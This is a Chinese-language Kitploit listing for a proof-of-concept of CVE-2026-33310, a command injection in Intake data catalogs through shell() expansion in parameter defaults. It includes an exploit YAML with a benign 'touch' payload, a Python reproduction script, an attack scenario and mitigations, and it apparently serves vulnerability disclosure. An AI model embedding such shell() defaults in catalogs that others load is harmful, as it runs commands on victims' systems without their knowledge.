Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-33310 — 概念验证,演示通过 Intake 目录参数默认值中的 shell() 展开实现命令注入,附带漏洞利用 YAML 与复现脚本。 | Kitploit
工具/GitHubGitHub/redyank/cve-2026-33310
Payload生成漏洞分析漏洞利用Web安全命令与控制
GitHubredyank/cve-2026-33310

CVE-2026-33310

概念验证,演示通过 Intake 目录参数默认值中的 shell() 展开实现命令注入,附带漏洞利用 YAML 与复现脚本。

查看仓库
14个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-33310

CVE-2026-33310(参数默认值中通过 shell() 展开导致的命令注入)

摘要

参数默认值中的 shell() 语法似乎在目录解析过程中会被自动展开。 如果目录包含诸如 shell() 的参数默认值,则在访问目录源时可能会执行该命令。 这意味着,如果用户加载了恶意的目录 YAML,嵌入的命令可能会在主机系统上执行。 此行为可能被归类为 CWE-78:操作系统命令注入 / 不安全的 Shell 展开。

详情

该问题似乎源于访问目录源时参数默认值的展开方式。

在目录加载和源访问期间:

Intake 解析参数默认值 负责展开默认值的函数会处理 shell() 语法 shell 表达式会触发子进程执行 由于这发生在目录评估期间,命令可能会在用户显式与数据集交互之前执行。

受影响的逻辑似乎涉及:

root@kitploit:~
expand_defaults()

以及相关的参数解析机制。

PoC

exploit.yaml

root@kitploit:~
metadata:
  version: 1
sources:
  rce_test:
    driver: csv
    description: "Testing shell expansion in parameters"
    args:
      urlpath: "{{ cmd_exec }}"
    parameters:
      cmd_exec:
        display_name: "Test Parameter"
        type: str
        default: "shell(touch /tmp/intake_rce_test)"

reproduce.py

root@kitploit:~
import intake
import os

PROOF_FILE = "/tmp/intake_rce_test"

if os.path.exists(PROOF_FILE):
    os.remove(PROOF_FILE)

print(f"[*] Proof file exists before: {os.path.exists(PROOF_FILE)}")

try:
    cat = intake.open_catalog("exploit.yaml")

    print("Accessing source...")
    _ = cat["rce_test"]

except Exception as e:
    print(f" Error during execution: {e}")

if os.path.exists(PROOF_FILE):
    print(f" Command execution confirmed, Found: {PROOF_FILE}")
else:
    print("Command execution did not occur.")

攻击场景

可能的攻击场景如下:

  1. 攻击者发布一个恶意的 Intake 目录 YAML 文件
  2. 受害者下载或加载该目录
  3. 受害者访问目录中的某个源条目
  4. 参数默认值被展开
  5. shell() 表达式触发嵌入命令的执行

影响

如果确认此行为并非预期设计,攻击者可以通过以下方式分发恶意目录文件:

  • Git 仓库
  • 共享数据集
  • URL
  • 数据科学工作流
  • 任何加载该目录的用户都可能在不知情的情况下,以其本地用户权限执行命令。

建议

可能的缓解措施包括:

  • 默认禁用 shell() 展开
  • 要求显式的选择加入标志(例如 allow_shell=True)
  • 限制从不受信任来源加载的目录执行 shell 如需更多信息或测试,请告知。 我很乐意协助进一步分析或验证。
下载工具